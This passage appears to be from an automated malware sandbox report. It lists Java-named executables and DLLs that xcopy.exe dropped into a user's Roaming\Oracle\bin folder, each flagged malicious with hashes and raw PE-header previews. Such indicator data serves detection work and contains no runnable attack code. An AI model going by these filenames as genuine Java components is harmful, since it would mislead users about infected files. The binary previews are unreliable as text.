                                                                                                                                                                                                                                  SSDEEP:6144:xmS8JPkixLg4yQKFK890ImYG1AjQ8POyfvWlb:xmS8JPki646FPqIa8POUvWlb
                                                                                                                                                                                                                                  MD5:590B782C3D2B8F877DEA800AC37CF75E
                                                                                                                                                                                                                                  SHA1:11203D09DF0D82613116FF411513D6B42663C6F2
                                                                                                                                                                                                                                  SHA-256:D9259F2CA2C6061F108EEEC069068DB1B74A7E9D73C8E5F965230131D1F12F77
                                                                                                                                                                                                                                  SHA-512:62686A93FA3954B31947423721AF034E121977D52020B1823D305AFFC4310E9B116A90AE256182BE0799E1A5789A5A5DFDB0DFF350BA129D6DFD8A7C0D5B7288
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............{...{...{..x...{..~.d.{......{.......{...x...{..z...{...z.h.{...~...{.L.~...{.L.{...{.L.....{.L.y...{.Rich..{.........PE..L.....d...........!.........n.......O.......................................p......A.....@.............................\...<...d....................>...(...P......p...T...............................@............................................text............................... ..`.rdata..............................@..@.data...P...........................@....rsrc...............................@..@.reloc.......P.......&..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):94336
                                                                                                                                                                                                                                  Entropy (8bit):6.2191141428832335
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:JPEoCW/ids8nBs+s8nBs8RGyeVK7qjh3rmKPNbS7cZPxyI:JFrj8wyutjZqMNbSgxL
                                                                                                                                                                                                                                  MD5:880941DFF89465EDB837E5366DDE07B1
                                                                                                                                                                                                                                  SHA1:E624187B592B664E1BB0549188B2B6094DC3B226
                                                                                                                                                                                                                                  SHA-256:8CDCBFD67668E1007D1B745E2FA1B84B9E6684FCCB2316915696CB8737DC4601
                                                                                                                                                                                                                                  SHA-512:9263DCDA1396D5158126F266168FB4529F81AD49B5017FA340B69698B429BACBE41EBC3E32FEC94A1D2CB5AA2797B4F3409F1A6E79D03177805CDB847BB206DA
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.................................3?....@.................................8...@....................H...(...p..(......T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc..(....p.......@..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):63104
                                                                                                                                                                                                                                  Entropy (8bit):6.7192278703816175
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:SoIVooMSJPA4rapntjMqI5JT8wcaZ5Z7YPxH:SoIWzWapnhMqM8wcazZ0xH
                                                                                                                                                                                                                                  MD5:9F1F7D5128818128366FC7C2373C44E2
                                                                                                                                                                                                                                  SHA1:35C588B5A5BB64288C6D10F74B2E578F4582DC16
                                                                                                                                                                                                                                  SHA-256:30CB462F6DC6F3EC0DB27045A661CF852AB1BFE9BBD203C66FC9353905A910EA
                                                                                                                                                                                                                                  SHA-512:1D4BD5E04387F018C7FFDE51C7810F49684A1860E6DFA6693470D6379A2754A218EA4AEAA78356C7442FB52D2274FD9B3E7C76C123EBE054EA56516C4FFEDBDA
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6:{.r[..r[..r[..{#..x[...#..v[...#..p[...#..g[...#..x[...#..s[..f0..s[..f0..y[..r[..?[..."..s[..."..u[..."..s[..."..s[..."..s[..Richr[..........PE..L...w..d...........!.....r...^......Iv...............................................i....@..............................................................(......p...@...................................@...............D............................text....p.......r.................. ..`.rdata...F.......H...v..............@..@.data...............................@....rsrc...............................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):145024
                                                                                                                                                                                                                                  Entropy (8bit):6.626516549866549
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:zAKw6HXE3VJF6veoci2pd9Vvv1TuwJelVAM962ZdrQzoGxj:zAtB33Ie9i2pd9Vvv1TuwJW5drQt
                                                                                                                                                                                                                                  MD5:96BADB6A5EFDFC1F9D351CFECD7EA7B8
                                                                                                                                                                                                                                  SHA1:13D23EBE595DCB2214105068E717259DB32C596F
                                                                                                                                                                                                                                  SHA-256:417537B339CA24B75CE0637683B42F0B5F67CC71B5D1FB6FC50F17F1C91BF5B3
                                                                                                                                                                                                                                  SHA-512:8A07DD45F25B73A497299A601898FA4D4711701F55D6172EE25DB9F9CBD981F710FB5A627C62340511CF565E449DAE4A458EE21A76ADF41E5923D0C75E47E034
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ce.>'..m'..m'..m.|.m-..mE|.l%..m3o.l$..m'..m...mE|.l+..mE|.l-..mE|.l&..m.}.l...m.}.l&..m.}em&..m.}.l&..mRich'..m................PE..L......d...........!.........F...............................................P.......-....@.........................@.......<........0...................(...@..4.......................................@............................................text...S........................... ..`.rdata...4.......6..................@..@.data........ ......................@....rsrc........0......................@..@.reloc..4....@......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):257664
                                                                                                                                                                                                                                  Entropy (8bit):6.807316395240072
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:Zc6w4G+rGpULlDcXtkCuaQHtWJbB2G+UVZaeBdyAHpEixiKMvnt4CYOkaQmcSfxy:u6wNXCs7zYA9xiNFiVg7s/uDoeBvhI7T
                                                                                                                                                                                                                                  MD5:6E0F4F812AE02FBCB744A929E74A04B8
                                                                                                                                                                                                                                  SHA1:16A266FE0791495390CB1A313B6DB9D63D5EE767
                                                                                                                                                                                                                                  SHA-256:2BD849EB1C9C7AECB405153DCF7F3BED088E1DDB95C450C6B3ECE3E7F19AE61C
                                                                                                                                                                                                                                  SHA-512:8FDEA3F3BEB8C1DF754FCDC342CF9A918AF0EA512E26FF2D7C93A72F8CEFEF9438D7DA91B94185FC78E1AC78A574F9C68C249D195D3DA4CE0C21E66B98C07FBF
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..................................\....@..................................!..d....P..................(..........P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):396416
                                                                                                                                                                                                                                  Entropy (8bit):6.390753556955542
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:oLX8PC7NKdHVnfiMB7yIL+5IyoiYv5jPaeTmJWIvDxT9o:Qx7KiBLZ05jNTmJWEx6
                                                                                                                                                                                                                                  MD5:80FF8ABC9431B8637B597CE1E60CF7A9
                                                                                                                                                                                                                                  SHA1:C8CBB6773A9A4BBCD01FF8637E81CD2ECAE664C3
                                                                                                                                                                                                                                  SHA-256:D27635CF7E24F228DCB470B71ADB5C5DD6EF6D598139005F92F227524813413E
                                                                                                                                                                                                                                  SHA-512:77481D80F8147E9364FB0AEE02CA54F6EA179C167EE779C890410E6CE69DE67FFAD09CA245BE5303013749F4ECCC6522ABE03540D6E5705E688BED9C22725C4F
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..........................`......uS....@.....................................x........................(...0..l)..L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc..l)...0...*..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19584
                                                                                                                                                                                                                                  Entropy (8bit):6.785172982743353
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:qKRSM5y4JhvMjbf05JkUCpIYi1oMzPxh8E9VF0NyxdhhG:qnMs4rva0/pC+YiJzPxWELs
                                                                                                                                                                                                                                  MD5:D101B8581DDB13D88B79A14A063D4990
                                                                                                                                                                                                                                  SHA1:89F00428ABC84830A9ADE753E023795A4F281279
                                                                                                                                                                                                                                  SHA-256:45D3834EA3CE9AB37FF617D86BD7C35957A254F4A19AFD87769B8FACCF03C9D2
                                                                                                                                                                                                                                  SHA-512:2C2E27FCC6D2B431F4FB9A6A9EDED3932DAC3605C1FB79F9B838C18F97E08B1F176409B6F3BCA243418BFB1056BEB1EAB8BCE2C62EA214A08741CD783A2A35A8
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................~.....z.....{.....|.....m.~.......~.......~.....m.z.....m.......m.......m.}.....Rich............PE..L.....d...........!......................... ...............................`...........@..........................%..L...<&..d....@...............$...(...P..T...x!..T............................ ..@............ ...............................text...k........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..T....P......."..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):177280
                                                                                                                                                                                                                                  Entropy (8bit):6.713912669785536
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:AvyafmXKmGb5SZWKsCE73ekmweZ9WDJWF3P3iljR+tmxT:ARfmXKNx3ek+9WDJ4P3ihR+G
                                                                                                                                                                                                                                  MD5:6166028FAA7270372C62F37E69B90736
                                                                                                                                                                                                                                  SHA1:A4E8141AA8A8D9BBA488A7F0A311560176323CD8
                                                                                                                                                                                                                                  SHA-256:A1DE6A56CF2C0BC6C17D629BD1499C6441960589FA64ACA213C436F705DD6575
                                                                                                                                                                                                                                  SHA-512:A4C7A8167017BF6FEDC33F39A5B249ACA770D7CB2D1C608420AA5B10896F3A1B9BC40E112493844D156A1CF0161502F82C634BA771059B644FA0A7228624A939
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"...Cg..Cg..Cg..;...Cg.;f..Cg..(f..Cg..Cf.Cg.;...Cg.;b..Cg.;c..Cg.;d..Cg.w:c..Cg.w:g..Cg.w:...Cg.w:e..Cg.Rich.Cg.........................PE..L.....d...........!................N.....................................................@..........................^..h...H_...........................(......D,...Z..T...........................@Y..@...............4............................text...r........................... ..`.rdata...f.......h..................@..@.data...L....p.......V..............@....rsrc................Z..............@..@.reloc..D,...........^..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29824
                                                                                                                                                                                                                                  Entropy (8bit):6.712871246563921
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:bOBeFDLYVe4RTkPEeTPn+tjYiPdPxWE+Hj6:CBSkemkPE2n+tj7PdPx4j6
                                                                                                                                                                                                                                  MD5:E4A369B988F20DBC9DF9A80A5D2CE903
                                                                                                                                                                                                                                  SHA1:C37A59BB188FD076CD826D9EDED78C2D67F0C735
                                                                                                                                                                                                                                  SHA-256:75773AC0C77255030AD2325094106BCA22C975B11AD8FC4F5660FAA526D7996C
                                                                                                                                                                                                                                  SHA-512:FF92811586979F687C9735EF97B2F3F5B60AA434319A663FCE7AFB01E67E5089F72240592FD094E8ED254A2915463424A1109659B320A63DBC4BD803B86C0D4F
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........yRY...Y...Y...P..._...;...[...M...Z...Y...|...;...R...;...S...;...X......X......X......X......X...RichY...........PE..L...}.d...........!....."...(.......'.......@......................................\.....@......................... O......0V..x....p...............L...(......0....J..T............................J..@............@...............................text.... .......".................. ..`.rdata.. ....@.......&..............@..@.data........`.......B..............@....rsrc........p.......D..............@..@.reloc..0............H..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):117376
                                                                                                                                                                                                                                  Entropy (8bit):6.624138935674876
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:s0Qs7Q6rVElwi5EUPV0lIk3DZsAOMvcY3iZMyLNhLZEnTxE6:37An5EM+ymcYSZN/Lf6
                                                                                                                                                                                                                                  MD5:2704A438A100C9853F0F7498BFE78DDA
                                                                                                                                                                                                                                  SHA1:BB891629E5D100C2C44570E9185FBA061E089A25
                                                                                                                                                                                                                                  SHA-256:660F62AE555BBE091260C8716A7EBF716D65EA468CE42A7E52A8DB27E3C5B5A7
                                                                                                                                                                                                                                  SHA-512:62623D38553F508E86E9A473F80CB1A6CBCCEC3C1260220C602BF1CBC40A5E1EEAAEE4E9FC89DAD7E7E3B82B77BBD5055894E2B13D01F6164D01A23951608C48
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@.v.....................f.......f.......f.......f...................................,..................................Rich............................PE..L...W..d...........!.....&...|.......#.......@.......................................t....@.........................p....... ............................(...........i..............................Hh..@............@...............................text...6$.......&.................. ..`.rdata..b[...@...\...*..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60669056
                                                                                                                                                                                                                                  Entropy (8bit):6.693142467576719
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:786432:jzm9v4laJupkMmYm1SJNavtSU2NwzIqkcwaiaF3CrYVcbG+H:+v4l/OY8SJ4zTkpHaFk2G
                                                                                                                                                                                                                                  MD5:61F1916C10F9A7EFD7598D91FB45CCCD
                                                                                                                                                                                                                                  SHA1:5F475C0C9FC1E65EF2F6DD57CF2804E37874F056
                                                                                                                                                                                                                                  SHA-256:6CC20137DD08239B8A47B805CF94F6D8B04AFD41C66A5942CEECA246061C2EC2
                                                                                                                                                                                                                                  SHA-512:0DD043CA8547FB125014A513B96498934A7FFA2064A0EF19D7FDF2ABAC92CCBD5813A3301D08743F62ADF4AB3590BFE3AABBAB9052B70BA45E182969AD70E690
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........p...#...#...#...#...#..s#...#.."...#.."...#.."...#.."...#..s#...#.."...#.."...#...#.#...#...#.."E..#.."...#..q#...#.."...#Rich...#................PE..L...I..d...........!.....`...0........o......p...........................................@.........................0..........h......@................(...........J......................@K...... J..@............p...............................text....^.......`.................. ..`.rdata...x...p...z...d..............@..@.data..............................@....rsrc...@...........~..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.82213594687011
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:JcF+beUJ4rLJaBjuQaq82HFefrOMIYi1odOePxh8E9VF0Nyk4m:JcF+beU98o0fraYiczPxWECB
                                                                                                                                                                                                                                  MD5:00B2C4D79BCB85E59A00A6136B42A898
                                                                                                                                                                                                                                  SHA1:4E42BD0B41B6A82D9BDCC5994524665D41A8B2A1
                                                                                                                                                                                                                                  SHA-256:23894317FC9003F99E49E73F1ECC18CBEA23B9A351D6AF84F010A48F11E4B936
                                                                                                                                                                                                                                  SHA-512:51B6872C64227383CC135FF54896B394BA580EC183506DC7C77AA4868E6614B59FBF2AB44F5A298E70BF3A0F16505FAB52BBFC26B133AD19E1C2A539F5D34084
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................`............@..................................&.......@..H............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):225408
                                                                                                                                                                                                                                  Entropy (8bit):6.823928021904215
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:NOPWyjlIPa1Kjw4dLoylXoAVLhGrtWJXzgMjGPKinN5uehz2D/0YvTKV7PUJrKc6:oDjlIpjweXpl4CiSehc/pvT8UJrKcnJs
                                                                                                                                                                                                                                  MD5:825468A63B1D6917D73035C038D2B7D5
                                                                                                                                                                                                                                  SHA1:34576CDD6868E01FA0AEBCB2BF7E27484E9581D2
                                                                                                                                                                                                                                  SHA-256:BC6A888CE01FE7EC8356AFDAB744C999800D391FBFC70041D961D03C9EE4F006
                                                                                                                                                                                                                                  SHA-512:E694A96695EFD259322C013C7D094B1C837746E472435CF4D446DBDE41CD683B651D9ACD9621CF1AEC3129E3E25DAB392991B23FD8D10BEEAEE144C59AB43F13
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................h..........5.....................................F.......F.......F.7.....F.......Rich............................PE..L...{.d...........!.....L...................`............................................@......................... !..p...."..d....P...............H...(...`..........T........................... ...@............`...............................text....K.......L.................. ..`.rdata..H....`.......P..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):279680
                                                                                                                                                                                                                                  Entropy (8bit):6.110165526137236
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:pYq4xDPMvHf8SuJTA3BOmVhTFpSwoMYzApMOjYvCwZ7GNpQGPDwvrWJNW55LtVb9:YLMSiBOmVheAb/saYhBNWupVqi5rZ1b
                                                                                                                                                                                                                                  MD5:6582998BB860EAC44D51B63DF17DA488
                                                                                                                                                                                                                                  SHA1:2C08294AC82F1A2D15B330D3B8AD94E882D66AEE
                                                                                                                                                                                                                                  SHA-256:51BB85B12D2389344CF1CC9944ABFE3D5860264471386660A9A39BC099C0EC3A
                                                                                                                                                                                                                                  SHA-512:828481087EAB453E8842B93F808028094FE69ADA03F18F9CC3831AC7EB08DA1AD3B1583C2107F28A3BF34449E0510939B646E345FC544EBA5C8C1FC9EFA59C7D
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9.w.}...}...}...t...i.......y...i...v...i...{......|.......v.......{...i...|...}.../.......[.......~.......m.......|......|.......|...Rich}...........PE..L...*.d...........!.........J......|........................................P......-.....@.....................................h........................(... ..h....P..T....................P......XO..@...........................................text...v........................... ..`.rdata..4...........................@..@.data............(..................@....rsrc...............................@..@.reloc..h.... ...0..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):121984
                                                                                                                                                                                                                                  Entropy (8bit):6.270079037519984
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:r834fRZ5Nyf446dewltB2mNd/HOrveW1dex6:s446d7T/H47
                                                                                                                                                                                                                                  MD5:D2A9769D940F6FC579FEBFDA0EC9053A
                                                                                                                                                                                                                                  SHA1:280FD5BA256A50D8CC812F5DD3B96E1CE9BFF7CB
                                                                                                                                                                                                                                  SHA-256:6FF9E17276C12E642A92A70A92B76784387C8C417A232AB8377C0C7F3E565575
                                                                                                                                                                                                                                  SHA-512:7606A6958CEE14AC05348901BC54901888277208B00153F8C4012AFAD175A003A4BC9C87D587563739B98CBC2F8407C27AE3A5C0C11924CB9A6ED5D6FF62A73C
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..................................p....@.....................................h........................(..........`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):26240
                                                                                                                                                                                                                                  Entropy (8bit):6.696148567294591
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:ejN7os9RC3z2moP/S6I0YiwLPxWEIQbxs:u7oawK3I07iPxNxs
                                                                                                                                                                                                                                  MD5:AC403F097B4FAEE109EE47BC7AE81859
                                                                                                                                                                                                                                  SHA1:53D98BA27BD82B83901DB796B020C8F72327F8C3
                                                                                                                                                                                                                                  SHA-256:38E01261E734CDDEDF72EFEA639421E54EB7CB25510EC8D370DF6B0EFA8785E1
                                                                                                                                                                                                                                  SHA-512:63E1773EF1797037652F3C226A2FF02E1D2458724D6023A6F6C667B3AAFEFE4DD6FC955FEB972A3E205E061FF30E01A36465D8390380D800B3BC4ADF6D7EA41A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q.yV0.*V0.*V0.*_H{*T0.*4H.+T0.*4H.+\0.*4H.+W0.*B[.+S0.*V0.*k0.*4H.+X0.*.I.+T0.*.I.+W0.*.I.*W0.*.I.+W0.*RichV0.*................PE..L.....d...........!.........&...............0.......................................f....@..........................7......t>..d....`...............>...(...p..$...@2..T............................1..@............0......47..@....................text............................... ..`.rdata.......0......................@..@.data...4....P.......2..............@....rsrc........`.......6..............@..@.reloc..$....p.......:..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):288896
                                                                                                                                                                                                                                  Entropy (8bit):6.401378311812531
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:yD8UCue7q2UvkrHsorMh5UuI1uNu4eHZnkaCKfvRGa/:yDsG2UvkrHJrMhC9tkSvRGa/
                                                                                                                                                                                                                                  MD5:165F1A3E19E22E130AFC2D002F9D844B
                                                                                                                                                                                                                                  SHA1:DA1BFBDB639F731E24F2A07927C9E2D6A8460017
                                                                                                                                                                                                                                  SHA-256:9B41836022F06ED1E4F5890C33C8D01494CE83E090D175F4CD4BFD04DB1C5DB0
                                                                                                                                                                                                                                  SHA-512:46FDC46BBDF987318679B3EE71E4079A4D580001ADA76777E4D873A81EF249BA93D41BF5D17B3FF7365CB2C1AE8B3A818477B404ED4C8FC7259F3B2B52B488DE
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......vm;.2.U.2.U.2.U.&gV.8.U.&gP..U.Pt..3.U.PtQ.".U.PtV.%.U.&gT.;.U.&gQ.!.U.2.T..U.PtP...U.uP.5.U.uU.3.U.u..3.U.uW.3.U.Rich2.U.........PE..L...g.d...........!.........................................................p............@.........................`...........d....@...............@...(...P..d.......T...............................@...............\............................text.............................. ..`.rdata..8P.......R..................@..@.data...`.... ......................@....rsrc........@......................@..@.reloc..d....P... ... ..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll

